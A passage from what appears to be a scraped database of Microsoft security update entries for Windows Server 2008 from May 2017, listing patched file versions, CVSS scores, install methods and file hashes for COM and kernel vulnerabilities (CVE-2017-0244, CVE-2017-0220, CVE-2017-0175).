07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:35| Not applicable| Not applicable \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform**| **Service branch** \n---|---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 401,408| 06-Feb-2016| 04:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 401,408| 07-Apr-2017| 16:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:46| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 16:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:42| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:45| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:47| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:51| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 356,352| 07-Apr-2017| 16:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 348,160| 07-Apr-2017| 16:44| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 802,816| 07-Apr-2017| 15:22| x86| Not applicable \nOle32.dll| 6.0.6002.19773| 1,321,472| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,318,912| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.19773| 551,424| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.24089| 554,496| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Jan-2007| 19:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:50| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 20:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 27-Nov-2006| 21:37| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 13-Dec-2006| 22:22| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 16-Jan-2007| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:19| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 07-Nov-2006| 03:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 18-Jan-2007| 03:20| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 09-Nov-2006| 03:58| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Nov-2006| 07:09| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 15:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 15:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:35| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:35| Not applicable| Not applicable \nComcat.dll| 6.0.6000.16386| 7,168| 02-Nov-2006| 09:46| x86| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:01| x86| Not applicable \nComcat.dll| 6.0.6002.24089| 7,168| 07-Apr-2017| 15:23| x86| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:31| x86| Not applicable \nCsrsrv.dll| 6.0.6002.19680| 49,664| 12-Aug-2016| 18:55| x86| Not applicable \nCsrsrv.dll| 6.0.6002.24089| 49,664| 07-Apr-2017| 15:23| x86| Not applicable \nKernel32.dll| 6.0.6002.19623| 894,976| 18-Mar-2016| 17:09| x86| Not applicable \nKernel32.dll| 6.0.6002.24089| 895,488| 07-Apr-2017| 15:23| x86| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,208,568| 21-Mar-2016| 22:57| x86| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,209,592| 11-Apr-2017| 04:10| x86| Not applicable \nOleaut32.dll| 6.0.6002.19773| 574,464| 14-Apr-2017| 20:31| x86| Not applicable \nOleaut32.dll| 6.0.6002.24089| 574,464| 07-Apr-2017| 15:24| x86| Not applicable \nNtkrnlpa.exe| 6.0.6002.19764| 3,610,856| 06-Apr-2017| 16:06| Not applicable| Not applicable \nNtoskrnl.exe| 6.0.6002.19764| 3,558,120| 06-Apr-2017| 16:06| Not applicable| Not applicable \nNtkrnlpa.exe| 6.0.6002.24089| 3,613,416| 07-Apr-2017| 15:31| Not applicable| Not applicable \nNtoskrnl.exe| 6.0.6002.24089| 3,562,216| 07-Apr-2017| 15:31| Not applicable| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 783,872| 06-Feb-2016| 02:12| x86| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 783,872| 07-Apr-2017| 15:24| x86| Not applicable \nSmss.exe| 6.0.6002.19598| 64,000| 06-Feb-2016| 00:32| x86| Not applicable \nSmss.exe| 6.0.6002.24089| 64,512| 07-Apr-2017| 14:22| x86| Not applicable\n", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows COM Elevation of Privilege Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0244"], "modified": "2017-05-09T07:00:00", "id": "KB4018556", "href": "https://support.microsoft.com/en-us/help/4018556", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T14:39:35", "description": "None\n## Summary\n\nAn information disclosure vulnerability exists when the Windows kernel handles objects in memory incorrectly. An attacker who successfully exploits this vulnerability could obtain information to further compromise the user\u2019s system. \n \nTo learn more about the vulnerability, go to [CVE-2017-0220](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-0220>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018821>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018821-ia64.msu| B8ECB73E699059F0F5C79E745E86CD34AA168A5D| D2B5077D87A39B40833961529E3ED45FA68C0E063CDFA4B3502FFF15178F041D \nWindows6.0-KB4018821-x64.msu| 7FC26196E33CADEE355BE64D64386F180C786DFE| 78A34D40A2B3C7DE99D4860DB1EA47FC718377A90C2F069F63B482F92B406DD5 \nWindows6.0-KB4018821-x86.msu| FD7962C2823A878BC2F8EBCE54FED2320AA47BB6| C0955D29940AED39E34B561596886FB5AFDCA065238F94F413F208C2224C835B \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Vista and Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTdx.sys| 6.0.6002.19762| 229,376| 04-Apr-2017| 14:41| IA-64 \nTdx.sys| 6.0.6002.24087| 229,376| 05-Apr-2017| 14:39| IA-64 \nAfd.sys| 6.0.6002.19762| 985,088| 04-Apr-2017| 14:42| IA-64 \nAfd.sys| 6.0.6002.24087| 985,600| 05-Apr-2017| 14:40| IA-64 \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTdx.sys| 6.0.6002.19762| 94,720| 04-Apr-2017| 14:58| x64 \nTdx.sys| 6.0.6002.24087| 94,720| 05-Apr-2017| 14:59| x64 \nAfd.sys| 6.0.6002.19762| 404,992| 04-Apr-2017| 14:59| x64 \nAfd.sys| 6.0.6002.24087| 404,992| 05-Apr-2017| 15:00| x64 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTdx.sys| 6.0.6002.19762| 72,192| 04-Apr-2017| 14:35| x86 \nTdx.sys| 6.0.6002.24087| 72,192| 05-Apr-2017| 14:35| x86 \nAfd.sys| 6.0.6002.19762| 273,408| 04-Apr-2017| 14:35| x86 \nAfd.sys| 6.0.6002.24087| 273,920| 05-Apr-2017| 14:36| x86\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security Update for the Windows Kernel Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0220"], "modified": "2017-05-09T07:00:00", "id": "KB4018821", "href": "https://support.microsoft.com/en-us/help/4018821", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T13:20:46", "description": "None\n## Summary\n\nAn information disclosure vulnerability exists when the Windows kernel handles objects in memory incorrectly. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system. \n \nTo learn more about the vulnerability, go to [CVE-2017-0175](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-0175>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018885>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018885-x64.msu| 34C9F60A1F71096FC09468A3B01D6F25BDC650C5| 700BACCAC756B6B9191DA6496DDD34EA409CC112A9881BCB6866DB7990BCF86C \nWindows6.0-KB4018885-ia64.msu| AACBF3F515589867E73BAFDD26B8F4E500F9D23D| 9C66687AAE18338951057577459EA0CC10C357135DEB5C1D53413DA1D9F28481 \nWindows6.0-KB4018885-x86.msu| F68E692B0B5AC3ED45071E808B296A60DA359A8E| BCF6ACC8F3427AD3135C1E5387544C527153F60535D0A2D9B16D0DA0475C284F \n \n \n**File information** \nThe 